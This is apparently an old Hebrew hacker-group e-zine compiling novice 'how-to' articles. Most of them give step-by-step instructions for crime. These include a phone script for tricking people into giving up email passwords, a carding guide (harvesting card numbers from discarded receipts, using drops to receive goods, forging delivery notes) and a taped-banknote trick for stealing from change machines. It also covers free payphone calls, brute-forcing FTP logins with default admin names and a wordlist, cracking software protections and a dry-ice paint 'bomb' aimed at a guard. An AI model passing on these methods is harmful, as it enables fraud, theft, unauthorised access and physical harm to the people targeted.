שמועות הגיעו לאוזני ממקורות פנימיים בחברה אשר מייצרת את המודמים שכשאר מוציאים את הכבל,

של המודם מהחשמל הוא פוגע בפינים של המודם (PIN2). ולאחר הרבה פעמים יכול לגרום לשריפה של המודם.

אז כמובן אני פה מביא לכם שיטה ממש טובה לאתחל את המודן בלי להוציא אותו מהחשמל.

עושים ככה

Start -> Run -> telnet 10.0.0.138>

יפתח לכם טרמינל שהוא בעצם למודם.

אם אתם רוצים לעשות ישר ריבוט תכתבו את זה. קודם כל תצטרכו סיסמא (לקח לי שנים לגלות אותה(לפצח))

password = XXXXXXXX

[XXXXXXXX] = (password) כן כן, בזק הדפוקים שמו על המודם את הסיסמא הנפוצה ביותר (password).ץ

אז הססימא היא password ואז אתם יכולים לעשות שתי דברים:

1. לכתוב HELP ולקבל את כל התכונות שאפשר לשנות,

אבל אני לא ממליץ לגעת שם רק אם אתם יודעים מה אתם עושים.

2. לכתוב reset ולחכות. הוא יתאחל בשבילכם את המודם והכל יהיה בסדר.

מקווה שזה תוסף נאה והראה לכם עוד דברים על המודם אורכית ועל בזק.

נ.ב. בזק הגבילה את המרכזיות שוב פעם בתאריך 19/02/01 אז אם אתם משמ גולשים לאט עכשיו,

אז בזק אשמים תתבעו אותם או תתנתקו מהם (זה מה שאני הייתי עושה).

אם אתם באותה מהירות עדיין אז יש לכם מזל ואני כמעט בטוח שכל מי שעם מודם אורכית נשאר רגיל.

                         אני מה זה מרחם עליכם - מחזיקי אלקטל !

 

 

Pirs[i]ng

 

 

שימוש בפסיכולוגיה כדי לגנוב סיסמאות.

 

הערות/אזהרות כלליות:

אנו, ארגון ההאקרים הישראלי, לא אחראים לשום נזק שייגרם עקב הקריאה הן בצד המשפטי והן בצד הפיזי, כל האחריות מוטלת על הקורא בלבד!

טקסט זה נכתב על מנת להעביר למשתמש יידע נוסף ולא על מנת לגרום נזק כלשהו!

 

 

יש כיום המון שיטות לגניבת כל מיני סיסמאות בכדי להשיג גישה לכל מיני דברים.

אני אראה לכם שיטה אחידה שעובדת להשגת כל סוגי הסיסמאות. לא צריכים כל ידע קודם במחשבים.

מה שכן צריכים זה אמצעי תיקשור כגון אימייל, טלפון, דואר וכו'.

איך זה עובד? אני אתן דוגמא.

הטלפון בבית של משפחת פדלמן מצלצל. מר פדלמן עונה. השיחה מתנהלת...

 

מר פדלמן: הלו?

 

אתם: שלום, מדבר מתן מאינטרנט זהב.

 

מר פדלמן: אה, אתם אלה שאחראים לאינטרנט שלי, נכון?

 

אתם: נכון מאוד. לכן אני מתקשר. האם במקרה ניסית לגשת לאימייל שלך היום?

 

מר פדלמן: לא, הייתי מאוד עסוק היום... למה?

 

אתם: הממ, כן, גם אני. היו לנו בעיות עם שרת הדואר. הוא קרס וכל החשבונות נמחקו.

 

מר פדלמן: וואי... מה אתה אומר? אז כמה זמן ייקח עד שאני אוכל לבדוק שוב את האימייל שלי?

 

אתם: אני מקווה שהכל יתוקן בדקות הקרובות. אני אחראי על איסוף המידע מחדש והכנסתו חזרה למחשב.

האם במקרה את הזוכר מה היה שם המשתמש שלך?

 

מר פדלמן: שם משתמש?

 

אתם: כן. זה החלק שבא לפני סימן ה @ בכתובת האימייל שלך.

 

מר פדלמן: אה. הבנתי. אם כך אז שם המשתמש שלי הוא fedelman.

 

אתם: יופי, מצויין. אני אוסיף את זה ברגע זה.

 

מר פדלמן: אוקי, תודה.

 

אתם: מה תרצה שתהיה הסיסמא שלך?

 

מר פדלמן: אני חייב לבחור סיסמא חדשה, או שאני יכול גם להשתמש בישנה?

 

אתם: איך שנוח לך. אתה יכול פשוט להשתמש בישנה.

 

מר פדלמן: סבבה. הישנה קל לי לזכור. זה qwert.

 

אתם: רק רגע...

אוקי. הכל תקין עכשיו. תוכל לבדוק את האימייל שלך בעוד דקה או שתיים.

 

מר פדלמן: תודה רבה.

 

אתם: אין בעד מה, שיהיה לך יום נעים.

 

מר פדלמן: תודה. גם לך.

 

-סוף שיחה-

 

 

המממממ... תתאמנו עם חברים, עד שהולך לכם חלק.

שכל חבר יישחק חלק אחר. פעם אחת זה שעובדים עליו, ופעם אחת ההאקר.

ככה תתחלפו כל פעם. עליכם להשתמש בדימיון, להיות פתוחים למחשבות,

ולשים את עצמיכם במצב של מישאתם טוענים שאתם.

כדי להיות חלקלקים עליכם להתאמן, להתאמן, להתאמן ולהתאמן. תיהנו.

 

By waMaw

 

 

קטעים מהביוגרפיה של ההאקר המפורסם בעולם שסופרו ע"י האסיר פיאו לי.

 

כל אותם השנים שלפני ההודאה, לא נתנו לו להגן על עצמו.

הגישה לספרייה אסורה, פגישות אסורות, שום אמצעי תקשורת. שום מחשבים, אפילו לאפ טופ מסכן (ללא מודם, ללא יציאות PCMCIA, אפילו ללא פורטים חיצוניים) נראה לסוהרים כצעצוע מסוכן מדי בידיו של ההאקר המפורסם.

לפעמים הוא היה מקבל לידיו מחשב, לשימוש של כמה ימים, אחרי זאת המחשב היה נלקח ממנו והיה מושמד אחרי בדיקה מדוקדקת של וועדה מיוחדת.

 

הוא ישב בכלא במשך יותר 5 שנים. בית הסוהר של לוס-אנג'לס, תודות לו הכי מפורסם בעולם הווירטואלי. כמו כן הכי שמור במדינה כולה.

במשך כל אותו הזמן הוא התנגד, ניסה להוכיח את חפותו.

"מה שהניע אותי היה סקרנות ילדותית פשוטה, יכולתי להיכנס לביתכם, לעלעל בספרי הספרייה שלכם, לפתוח את המקרר שלכם אבל אני מעולם לא לקחתי דבר".

בספטמבר 1998 הוגש נגדו כתב אישום, התובע דרש בידיד של מאתיים שנים מהעולם החיצון

 

רוצח בקליפורניה, במקרה הכי טוב יקבל 3 שנות מאסר. אילו קווין מיטניק היה רוצח, הוא בטח היה משתחרר בפחות זמן. אבל, הוא לא רצח אף אחד.

ב 4 באפריל, 1999, אסיר בית בכלא הסגור של לוס-אנג'לס מספר 89950-012 קווין דויד מיטניק (נולד ב 6.8.1963) הודה באשמה והגיע לעסקת טיעון עם הרשויות.

 

" האם אי פעם שדדו אותך בלילה, בסמטה חשוכה? כאשר יש לך סכין על הגרון, אתה ממש מצטער שבכיסים יש לך יש רק גרושים. אתה יודע איך זה עובד, אתה יושב 3 שבועות, לבד, מת משעמום. אחרי זאת מביאים לך תנ"ך מקומט בכריכה רכה וזוג ספרים של שומרי החוק השנואים, בכל אחד מהם, עשרות סיפורים על איך איזה חרא גנב את הארנק מסבתא זקנה ובגלל זה היא לא יכלה לקנות לעצמה תרופות ו 911 לא יכלו לעזור לה. וזהו. אתה מבין שאתה כבר לא יכול לצאת מזה. אבל, אני לא ממש מאמין שהחבר שלנו קנה את זה, הוא הרי גאון מטומטם, יכול להיות שחשב על משהו" 

 

הנה לפניכם כרונולוגיה של הפעולות הלא חוקיות הראשוניות של "מלך ההאקרים של כדור הארץ":

 

שנות השבעים. פריקינג (phreaking), ידוע יותר כפשע הקשור בטלפון, הפיכת הטלפון הביתי שלו למאין טלפון ציבורי, בהרמת השפופרת, במקום צליל של קו שומעים קול צרוד של גבר המבקש להכניס 20 סנט.

 

1980 פריצה לרשת המחשבים של סגל בית הספר שלו, לא נגע לא במאגר הציונים ולא בקבצים האישיים של המנהל, קווין ניסה את כוחו בלבד.

 

1981 פריצה מוצלחת לרשת המחשבים של מערכת חיל האוויר במדינתו, מדינת קולורדו.

קיבל נזיפה מהרשויות.

 

1982 לא ממש פריצה במובן של מחשבים, קוויו ועוד שני חברי הצליחו לחדור לבניין של חברת Pacific Bell ולגנוב ספרי הדרכה של COSMOS’y  ושל MicroPort’y .

המעצר הראשון 3 חודשים בלוס-אנג'לס, במרכז הטיפול בעבריינים צעירים + שנה על תנאי.

שבועיים אחרי השחרור, מעצר של 6 חודשים על שימוש לא חוקי במחשב האוניברסיטה לצורך גישה לרשת ה ARPHANet  של הפנטגון.

שחצי שנה הזאת ה ARPHANet  הפכה לרשת לצורכי חינוך בלבד, וקווין לאחד המומחים הטובים ביותר בנושא הטלפונים הסולריים ובנושא רשתות מחשבים.

 

" הוא היה ילדון, אוקי?  ואני סחבתי בשבילו ספרים מהספרייה, אז קראו לו עכברוש, הוא נגס בסלע מדעי השטן ביהירות רבה. הוא עצמו אהב שקראו לו "קונדור". איך שהילדים הלבנים האלה אוהבים כינויים קולנועיים"

 

במשך 5 השנים הבאות קווין הצליח להימנע מסכסוכים עם החוק, כלפי חוץ, הוא ניהל חיים משפחתיים שקטים בעיר קליפורנית קטנה "אלך האלונים" (Thousand Oaks). סוף האידיליה קרה בסמוך לחג המולד בשנת 1987.

 

1988 3 שנים על תנאי, על גניבת תוכנות מחברת Santa Cruz Operation , בסוף השנה קווין שוב מאחורי הסורגים. הוא מואשם בגניבת קוד מקור פרטי  ממעבדת המחקר של

Digital Equipment Corporation שנמצאת בפאלו אלטה, המטרה הייתה גרסה לא חוקית של מערכת ההפעלה VMS . דבר זה עלה לקווין בשנת מעצר.

חוץ מזה קווין נשלח לקורס של "ריפוי מהתמכרות למחשבים" של 6 חודשים.

 

תנאי השחרור: לעולם לא להתקרב למחשב עם מודם.

אז מיטניק לא מתקרב, משתדל למלא אחרי כללי המשחק. הדברים קורים כבאורך פלא:

הטלפון של הקצין מבחן מנותק, חשבון הבנק של השופט נעלם, ממאגרי המידע של בית המשפט בסנטה קרוז נעלם המידע על מעצרו ומשפטו של קווין.

מדברים על כך שבשנת 1990 אפילו ראו את קווין בישראל, לשם הוא הגיע בכדי להיפגש עם חבריו ההאקרים, למרות האיסור לצאת לחו"ל.

 

בשנים הבאות, חייו של מיטניק נכנסים לנתיב נורמלי, ואז פתאום, מות אחיו, האדם הקרוב אליו ביותר.

את הפעולות הבאות של מיטניק מסבירים בצורות שונות, יש האומרים שזה ניסיון להלחם בדיכאון ויש הטוענים שזה הרצון להשיג כמה שיותר כסף בפרק זמן קצר.

בזמן הזה הוא חשוד בבקשה לקבלת מסמכים סודיים ממשרד התחבורה של ארה"ב, הבקשה נענתה כיוון שהיא נשלחה ממשטרת המדינה.

כמו כן הוא חשוד בפריצה לרשתות הפנטגון וה FBI  באותה שנת 1992.

מנסים לתלו עליו את האשמה בציתות למחלקת האבטחה של חברת Pacific Bell.

ה FBI  עורך חיפוש בביתו של קווין, המצב מתלקח ומיטניק נעלם למספר שנים.

 

בין השנים 1992 1994 הוא חי בשקט בסיאטל תחת השם בראיין מריל. בתקופה הזאת חושדים שהוא אחראי לגניבת מערכות הבקרה של תקשורת סלולרית של החברות Motorola, Nokia  ו McCaw Cellular Communication Inc. , פריצה של מערכת האבטחה של חברת

Sun Microsystems, וגם גניבת גרסת ההרצה של מערכת אבטחת הרשתות SATAN .

אז הוא כמעט נתפס, המשטרה הצליחה לעלות בחכתה מספר טלפונים סלולריים, ספרים בנושאים של מחשבים, רשתות ותקשורת ומכשיר להאזנה לתדר של המשטרה.

 

חג המולד 1994 כמתנת חג החליט קווין להביא לעולם משחק חתול-עכבר עם אחד המומחים הגדולים ביותר בעולם במערכות אבטחה ציטומו שימומורה.

ציטומו לא רק שהיה מוכן למשחק עם קווין אלא גם הכין לו מלכודת, למעשה כל אחד יכל ליפול בפח הזה, לא הייתה כאן מטרה לתפוס את קווין.

מבחוץ הכל נראה כך:

המומחה הבינלאומי לאבטחת מחשבים, ציטומו שימומורה נסע לחופשה לנבדה ו"שכח" לנתק מן הרשת את מחשבו המוגן. המלכודת הייתה בכך שכל דבר שקרה במחשב תועד בלוג במחשב אחר.

כאשר המחשב נפרץ, ציטומו מיד קיבל על כך הודעה.

לפי המומחיות של הפריצה, הפיתיון נתפס ע"י מישהו משהו גדול.

אם קודם ציטומו לא התכוון לנקום, אך אחרי שלא רק נגנבו ממחשבו קבצים ותוכנות אבטחה, גם הושארו הודעות קוליות מעליבות.

ציטומו התחיל לפעול לתפיסתו של מיטניק, הוא פנה בבקשת עזרה ל FBI ולבסוף הצליח לגלות את מיקומו של מיטניק ברדיוס של 2 ק"מ.

ב 15 בפברואר 1995 בשעה 01.30 קווין נתפס.

 

ב 21.01.2000 קווין שוחרר לבסוף, אבל עדיין אסור לו להשתמש במחשב ולהעביר הרצאות בנושא מחשבים ולעבוד בכל משרה הקשורה למחשבים עד ה 20.02.2003, כאשר יהיה חופשי באופן סופי.

 

מעצרו של קווין לא הועיל הרבה בניסיון להפסיק את פעולות ההאקרים, אפילו נתן זיקה לפעולות אלו כי במשך מעצרו המון האקרים פרצו לאתרים שונים תחת הסיסמא "חופש לקווין" FREE KEVIN.

By Boris
כסף חינם

כאן E-man.

היום אני אכתוב על Carding.

Carding הוא מונח שהומצא לשיטה שבא אנשים קונים בכרטיסי אשראי לא-שלהם באינטרנט.

זהו דבר מאוד מסוכן ולא מומלץ למתחילים שבנינו.

אני אכתוב על תהליך הcarding מההתחלה, עד הסוף (הטוב והמר)

אז בואו נתחיל.

 

קודם כל, אתם בטח שואלי, מאיפה לעזאזל אני ישיג אשראי???

אז הנה התשובה:

יש שלוש שיטות שאני יודע עליהן, אני יתחיל מהמומלצת ביותר עד לא הכי מומלצת.

 

1) אתם מכירים את החנויות העניות האלה שעדיין משתמשות ב"מגהץ" לחיוב אשראי?

אלו הן המטרות שלכם! לכו בלילה לפח שמאחורי החנות (לא לשכוח לבוא עם בגדים ישנים ושחורים,פנס ותיק של טיול השנתי )

קפצו פנימה! אתם תגלו שכרגע קפצתם לאשפה הכי נקייה שראיתם בחיים. חוץ מניירות, לא יהיה שם כלום. בכל מקרה, תפעילו את הפנס שלכם ותתחילו לחפש ניירות קטנים כאלה בצבע אפור.

בדרך כלל הם נמצאים איזה חבילה של 100 בכל שקית זבל. מצאתם? יופי! יש לנו כרגע כרטיסי אשראי! (תלוי כמה היו שם). במקרה שבאמצע החיפוש שלכם אתם נתקלים בשומר, אל תזוזו! אם הוא שמע אותם, ואומר לכם לצאת, אל תצאו, תתחילו לעשות קולות מפחידים, זה בדרך כלל עובד (אתם יודעים, לילה חשוך והוא לבד, הוא מפחד בדיוק כמוכם- כי שומרים פשוט לא יודעים מה הם רוצים מהחיים שלהם , או תדחפו לו כמה דולרים(שוחד) ). אם הוא עדיין עומד שם ואומר לכם לצאת, תכוונו עליו את הפנס שלכם, ובעוד הוא מסתנוור, תברחו משם! - כמו שאתם תברחו ממחבל (רק אם אתם יכולים לקחת את השקית, קחו אותה). הגעתם הביתה? אל תצאו מהבית לפחות שבועיים (לבית ספר מותר :) מצטער :) ).

 

2) תפרצו... לא ממש לבוא ולשבור חלונות, אני מתכוון hacking. אבל זה רק למי שיודע.

 

3) זאת השיטה הכי פחות לא מומלצת. אתם מכירים את המכונות להשכרת סרטים נכון? אתם יודעים שאחרי שיוצא הסרט גם יוצאת חשבונית שעליה כתוב מספר כרטיס האשראי? עכשיו כן. בכל מקרה, תעמדו ליד המכונה כאילו אתם רוצים לבחור סרט, וכשמישהו אחר בא ומשכיר סרט, קחו את החשבונית ותברחו משם!

 

*** רק אם לאותו אחד שבא להשכיר סרט יש כרטיס אשראי בין לאומי (אני יגיד מהם בהמשך) אז עושים את השיטה הזאת.

 

אוקי, בהנחה שהגעתם הביתה בריאים ושלמים (טוב.. רק שלמים) אפשר להתחיל את המיון! תמיינו ככה,

 

כרטיסי אשראי שמתחילים ב: 40 - 49, 51 - 52, 60 ו 37 (זה כל מה שאני יודע מהסדרה של 3) בצד ימין

 

כל האחרים, צד שמאל.

 

מה שיש לנו עכשיו זה ככה:

 

צד ימין, כרטיסי אשראי מוכנים לשימוש!!!

 

צד שמאל, ערמה של זבל שצריך לשרוף.

 

כשאתם מחליטים שאתם רוצים לקנות תעשו את הדברים הבאים:

 

1) תשיגו מחשב שיש לו גישה לאינטרנט והוא לא בבית שלכם (בית ספר וספרייה  זה מושלם).

 

2) חובה אישור לעבודה על המחשב הזה.

 

3) דרך מילוט שקטה.

 

תביאו אתכם כרטיס אשראי אחד מהרשימה שלכם, כנסו לאתר שבו אתם רוצים לקנות, ותקנו! (אבל רק תוכנות להורדה בתשלום! לא לשלוח שום דבר הביתה!!!). במקרה שהאתר רוצה שגם תבחרו באיזה סוג כרטיס אשראי אתם משלמים חוץ מהמספר, הנה הסוגים:

 

40 - 49: ויזה

51 - 52: מאסטרכארד

60: דיסקברי

37: אמריקן אקספרס

 

אם אתם רוצים לקנות דברים שצריך לשלוח הביתה, זה כבר סיפור אחר, אתם צריכים "Drops".

Drops הם אנשים בעולם שאליהם אתם שולחים את מה שקניתם והם שולחים את זה אליכם הביתה, ככה המשטרה לא יודעת מה קרה לחבילה.

 

קודם כל אתם צריכים ליצור קשר עם drop, אני ממליץ לחפש בIRC.

 

אחרי שמצאתם לפחות 2 דרופים, תגידו להם (אל תגידו שיש לכם 2 דרופים, לכל דרופ תגידו שהוא הדרופ היחיד) שאתם צריכים דרופ בלהבלה ותבקשו כתובת. יש לכם 2 כתובות? מגניב! עכשיו תגידו לאחר הדרופים שהוא הולך לקבל חבילה בימים הקרובים והוא צריך לשלוח את זה אליכם הביתה, אבל אל תתנו לו את הכתובת של הבית, אלה את הכתובת של הדרופ השני! לדרופ השני (הכי טוב שיהיה ישראלי) תגידו לשלוח לכם את זה הביתה ותנו לו את הכתובת האמיתית. אם אתם ממש רוצים והדרופ הוא ישראלי, אפשר גם ללכת להפגש איתו אישית ולקחת את החבילה, אני ממליץ על זה.

 

אל תשכחו לשלוח לכל דרופ משהו (מתנה בשויי 20 דולר תספיק, כמובן מהכרטיס אשראי ולא מהכסף שלכם :) ).

 

אחרי שקיבלתם את החבילה, אל תתחילו להתלהב מזה ולספר לחברים!

תשמרו את החבילה בסוד עד יום ההולדת שלכם, ורק אז תגידו שקיבלתם את זה ליום ההולדת.

 

תתחדשו.

By E-man [I.C.F]

 

עוד שיטה- כסף חינם – בלי דרופים

 

1. אם אין לכם כוח לחפש דרופים שלחו את החבילה לבית נטוש או שעדיין לא התיישבו בו וכל.

2. הכינו מכתב שאומר:

__________________________________________________________

| שלום אני מר "השם שקראתם לעצמכם בהזמנה "                                           |

| מס' ת.ז. "מספר"                                                                                           |

| מס' "כרטיס אשראי"                                                                                                 |

| מבקש להשאיר את החבילה ליד הדלת כאשר אני לא נמצא בבית                                   |

|

|                                     תודה רבה

|                            מר " השם שלו "

|                                     חתימה

|__________________________________________________________

*סליחה אבל לא היה לי כוח להשלים את הפסים שמשמאל ( מה זה משנה ...)

שהכל יראה אוטנטי ואמיתי . כי אם לא חבל עליכם ....

 

3. כל יום תבוא ב7 אחר הצהרים לבדוק את הבית ואם אתם רואים את החבילה קחו אותה ותברחו ... כמה שיותר מהר .

 

By Old-Hacker [I.C.F]

 

איך לקבל אינטרנט יותר זול מכולם? מאת E-man

מושגים :

ISP = ספק אינטרנט .

---------------------------

אתם בטח יודעם כמה יקר השימוש באינטרנט בישראל...

19$ לחודש..

אחותי, על מה?

אם אתם חושבים כמוני, זה בשבילכם:

 

התהליך הזה הוא לאמיצים בלבד ויכול לקחת 3 חודשים או יותר

אבל בסוף זה משתלם.

 

הנה ההוראות:

 

1) הירשמו לאיזה ISP שאתם רוצים לתקופת ניסיון של 3 חודשים.

 

2) בתקופת ניסיון זו, התלוננו על כל מה שרק אפשר, כל שבוע .

 

3) אחרי שעברו ה-3 חודשים המפרכים האלה, הISP שאליו נרשמתם ישאלו אתכם אם תרצו להמשיך את תקופת הניסיון

 

תגידו שאתם לא רוצים כי ISP מתחרה (שאותו תכינו מראש ונסביר עליו בהמשך) הציע לכם מחיר טוב יותר.

 

4) בינתיים בISP המתחרה, תשאלו אם כדאי לכם לעבור מהISP הקודם שנרשמתם אליו לISP הזה, כמובן שתקבלו "כן! בטח!" תגידו שאתם לא בטוחים כי הISP הקודם יותר טוב, הם ישאלו למספר טלפון ושם ויגידו ביי

 

למחרת תקבלו טלפון מהISP המתחרה עם הצעה יותר טובה מהISP הקודם!

 

תגידו את זה לISP הקודם ותקבלו אינטרנט חינם! (כמובן לא חופשי חודשי אבל גם זה שווה!)

 

מה שיוצא לכם זה ככה:

 

ISP אחד מוזל מאוד עם חופשי חודשי

 

ISP אחר חינם בלי חופשי חודשי

 

כל מה שכתוב במאמר זה בדוק על ידי!

 

By E-man [I.C.F]

 

מזומן חינם... – איך לעבוד על מכונות שפורטות כסף

 

המאמר הזה יעסוק בדבר שכולנו אוהבים וצריכים (לא סקס יא ראש כחול!)

אני מדבר על $$$כסף$$$, מי לא אוהב כסף?

מי לא צריך כסף?

מי לא משתמש בכסף?

 

אם ענית על אחת מהשאלות האלה "אני", תעבור למאמר הבא.

 

בכל מקרה, בואו נעבור לחלק הרעיוני:

 

כולנו מכירים את המכונות האלה לפריטת כסף נכון?

רק תחשבו כמה כסף יש בפנים...

בוא נראה איך מכונה כזאת עובדת:

כשאתה מכניס שטר של 20 שקל (אנחנו תפרנים שכחתם? :) ),

המכונה סורקת אותו כדי למצוא סממנים שנמצאים בתוך השטר עצמו!

זאת אומרת שאם תכתוב 50 שקל על נייר ותכניס אותו למכונה כל מה שתקבל יהיה כאב ראש. (:

 

מה שאנחנו רוצים הוא לא לעבוד על המכונה,

אלה לא לאפשר למכונה לקחת מאתנו את השטר!

 

מכונות כאלה, *אחרי* שקראו את השטר ופרטו אותו, רק אז הן בולעות את השטר!

זאת אומרת שאנחנו לא רוצים לתת למכונה לקחת לנו את השטר היקר מכל שלנו.

 

איך עושים את זה?

עכשיו הגענו לחלק המעשי:

1) הכן לך מראש שטר של הסכום הרצוי (רצוי 20 שקל כי מי רוצה להסתובב עם 50 או 100 שקלים בארנק?)

2) מצא את נקודת האמצע של השטר ועטוף אותו במסקנטייפ (סלוטייפ עבה במיוחד)

זאת אומרת:

אם ככה נראה השטר:

 

                                                                     אמצע

|----------------------------------|

|                                              20 |

|                                                   |

|                                                   |

|             שטר                              |

|                                                   |

|                                                   |

| 20                                              |

|----------------------------------|

    

אז ככה יראה השטר אחרי ההדבקה שלנו:

                                                                                               אמצע

===================================-----------------------|

===================================                              20 |

===================================                                   |

===================================                                   |

===================================        שטר                   |

===================================                                   |

===================================                                   |

===================================                                   |

===================================-----------------------|

מקרא : = =   > מסקנטייפ

 

3) מכניסים את השטר המחובר למסקנטייפ למכונה ופורטים את הכסף (אל תעזבו את השטר!!!)

 

4) מחזיקים את השטר חזק (הוא לא יקרע אם עשיתם את זה נכון)

 

5) מחכים עד שהמכונה עוזבת את השטר ובבית מוציאים את המסקנטייפ

 

 

כל היופי בדבר הזה שאפילו אם השטר נקרע, עדיין קיבלתם את הסכום שלו חזרה במטבעות :) (ואפשר להדביק אותו חזרה ... ועוד לקנות דברים בזה ).

 

E-man [I.C.F]

דיבור ללא תשלום בטלפון ציבורי

 

זוהי הכתבה הראשונה של מילקי – אני צופה לו עתיד מזהיר...

 

אני רוצה להתקשר לחבר שלי ! ואני לא רוצה להוציא שיחה מהפלאפון שלי כי זה עולה כסף !!

ואין לי הרבה טוקמן ! או שאני דיברתי יותר מידי החודש ! זה לא משנה ! העיקר שזה חינם !

 

מצרכים:

פלאפון מהסוגים הבאים  נוקיה {משחקים בדוק}

סמסונג ! ועוד אני בדקתי על הסוגים האלה !

 

הפעולה:

אז עכשיו נלמד איך בדיוק עושים זאת !!

הולכים לטלפון ציבורי {רק על זה בדקתי} ומצמידים את הפרסקת של הפלאפון לפומית של הטלפון הציבורי ! ומתחילים לחייג את המספר בפלאפון ! אבל לא לחייג כי זה יעלה לכם כסף !

אז פשוט ללחוץ את המספר

דוגמא : המספר של חבר שלי הוא 12345 נגיד טוב ! אז ככה אני מצמיד את הבפרסקת {מאיפה ששומעים} של הפלאפון שלי !! לאיפה שמדברים בטלפון הציבורי ! ואני מתחיל לחייג את המספר שלו 1234 ולא לוחץ send

בשום אופן כי אז זה יעלה כסף ! אבל ברגע שאני רושם את המספר והטלפון ציבורי שומעה את המספרים ! והוא מתחיל לחייג ! יש טלפונים ציבורים ! שזה לא עובד עליהם זה מחייג אתה יכול להגיד מילה 3 שניות וזה מנתק אבל יש טלפונים שזה חופשי !!! אז מנצלים {חורשים עליו}

ליד הבית שלי אין טלפון כזה אבל יותר רחוק מצאתי טלפון ! רובם לא עובדים אבל יש גם שכן וזה שווה ! אז תיהנו !!!

 

By Milki [I.C.F]

 

 

הוספה...

 

השיטה עובדת גם על טלפונים עם מטבעות . ( כאלה שיש בחנות , בבתי חולים , בבית ספר ועוד...) עושים אותו דבר מצמידים את הפלאפון לוחצים מספרים וזה מחייג .

 

By Old-Hacker[I.C.F]

כוח ברוטלי

 

.Old-Hackerשלום לכולם . זה אני

 

תמיד חלמתם להריץ סיסמאות (010110 כמו בסרטים ) וזה בדיוק מה שזה כוח ברוטלי .

 

עם כוח ברוטלי אפשר לפרוץ לכל מקום באינטרנט : אתרים , אי מאיילים , אי סי קיו , מירק ועוד ... (פשוט הכל...).

 

טוב אז ככה  - כוח ברוטל י היינו שיטה  אשר מנסה לגלות את הסיסמא של דבר מסוים ע"י צירוף של כמה מספריים \ אותיות+ ניסיונות רבים - חוזרים ונשנים .

 

  של אתר שקוראים לו  זזז ( סתם...)FTP למשל : אם אני רוצה לפרוץ ל

אז הכתובת :

ftp.zzz.com

: יהיה לרוב user name וה

Root in unix\linux Server

Admin or administrator in NT\2K Server

 

ואת הסיסמא תנו לתוכנת כוח ברוטלי לחפש ...

 שאפשר Brute Force*התוכנה שאני הכי אוהב לכוח ברוטלי היא

להוריד אותה באגף ההורדות באתר שלי.

 

טוב לתוכנה יש שתי אפשרויות של חיפוש :

Word list

Brute Force

 

?Word listמה זה

זה ניסיון פריצה בעזרת מילונים שזה קובץ עם מספר רב של מילים שמנהל האתר אולי חשב עליהם כסיסמא ...

אפשר להשיג כאלה המון באינטרנט למשל קובץ של 20 מגה שנפתח ל80 מגה רק של מילים ( אני משתמש רק בו ... הכי טוב ).

http://hackersclub.com/km/files/password_cracker/wordlists/hh_dictall.zip

Burte Forceמה זה

זוהי פונקציה שאומרת למחשב להתחיל להריץ סיסמאות ... זה מחיל ב

Aa

Ab

Ac…

וככה זה ממשיך עד שזה מוצא את הסיסמא .

 

*אני ממליץ להשתמש במילונים משום שיש שם את המילים הנפוצות ביותר ..(וגם בגלל שאני משתמש בזה...).

By Old-Hacker [I.C.F]

פצצת צבע

 

מצרכים :

צבע והרבה - מומלץ להתחלק במחיר עם כמה חברים ... (ולדלל עם מים כדי שיצא יותר צבע )

לבוש ישן (מומלץ שחור)

חוש התמצאות

מומלץ חברים

קרח יבש

 

לבוא יום אחד ולארגן 5 חברים שכל אחד מביא כמה כסף וקונים צבע ( תיקנו את הכי זול שיש) לוקחים מים ומערבבים עם הצבע . בבקר למחרת באים ושמים את הצבע בפח מקרבים אותו לשומר ושמים את הקרח היבש בפנים … ואז צועקים " פצצה " ובורחים משם מהר ואז יש ספלאש...

 

 By cool-guy && blackdeath  && Old-Hacker

 

המדריך לCracker המתחיל \/ Zeos

===========================

 

תוכן עניינים:

=============

א.מבוא

ב.מה זה פיצוח

ג.מטרות הפיצוח

ד.חוקיות

ה.ידע נדרש

ו.ידע חובה

ז.כלים נפוצים למפצח

ח.הורדת הכלים

ט.תודות

 

 

א. מבוא

=======

לפני שאני ימשיך עם המדריכים המורכבים יותר כתבתי את המדריך הזה שכולל בתוכו דברים שכל מי שרוצה

להיות מפצח צריך לדעת וגם תוכנות שונות שצריך להשיג ומאיפה להשיג.

 

{הערה: סוג הפיצוח שמדובר הוא פיצוח תוכנות ולא אתרי אינטרנט או משהו אחר אם חשבת}

 

 

ב. מה זה פיצוח

==============

לפצח זה להתעלות על מערכות הגנה (הכוונה לתוכנות בד"כ במדריכים שלי) ולנתב אותם לכל צורך

שאתה רוצה. או לשנות כל דבר במחשב כך שיפעל כמו שאתה רוצה.

 

 

ג. מטרות הפיצוח

===============

נגיד והורדת תוכנה אבל , התוכנה מוגבלת ל - 30 יום , מה תעשה? או שתקנה אותה (דבר שקורה

לעיתים נדירות מאוד) או שבמקרה של המפצח תפצח אותה. כלומר תעשה שהיא תהפוך להיות מוגבלת ל 40

יום או משהו כזה, דבר שלא אפקטיבי כל כך או שבכלל אפילו תשתק אותה ככה שהיא לא תהיה מוגבלת

לשום ימים, בקיצור - לחסל לה את מנגנון ההגנה (מועה עה עה עה עה עה!!!! :)

 

עוד דוגמא למה אפשר לעשות עם פיצוח היא נגיד והורדת קובץ ZIP אבל אתה מגלה שאין לך סיסמא

אליו, אם תפצח את ההגנה שלו תוכל לקבל מהקובץ עצמו את הסיסמה הנכונה. ולא רק לקובץ ZIP אלא

גם למלא סוגים אחרים של סיסמאות מ WORD ועד לסיסמא של הפנטגון :)

 

הדבר הכי נחמד לדעתי (למרות שהוא לא דורש תחכום רב) שאפשר לעשות עם פיצוח היא להכין טריינרים Trainers למשחקים. מה

זה אומר ? נגיד אתה משחק במשחק כלשהו ואין לך כוח להפעיל קודים. אתה מפעיל את הטריינר שזאת

תוכנה שבעצם מפעילה מעיין קודים בשבילך. הרבה מפצחים בונים טריינרים וכי חשוב לציין כי מי

שרוצה לתכנת טריינרים חייב לדעת לתכנת בשפות אחרות כדוגמת VB או ++C או להשתמש ביוצר טריינרים (פחות מומלץ) .

 

נגיד קיבלת איזה דמו Demo ממגזין משחקים או מה שלא יהיה. במרבית הדמואים הם בעצם משחקים מלאים! וכל מה שאתה צריך

זה קצת לשחק עם ההגדרות שלהם בעזרת פיצוח ו-וואלה! יש לך משחק מלא .

 

אוקיי, דוגמה אחרונה למה שאפשר לעשות עם פיצוח היא נגיד שאתה בא למחשב של חבר שלך ורוצה

להוציא כל סיסמה שיש עליה **** (כמעט כל סיסמא) , אז אתה חושב לעצמך - "אם רק יכולתי לראות

מה יש מאחורי ה **** " באמצעות פיצוח תוכל "לשלוף" את הסיסמא בקלות מתוך הכוכביות ואפילו יותר...

 

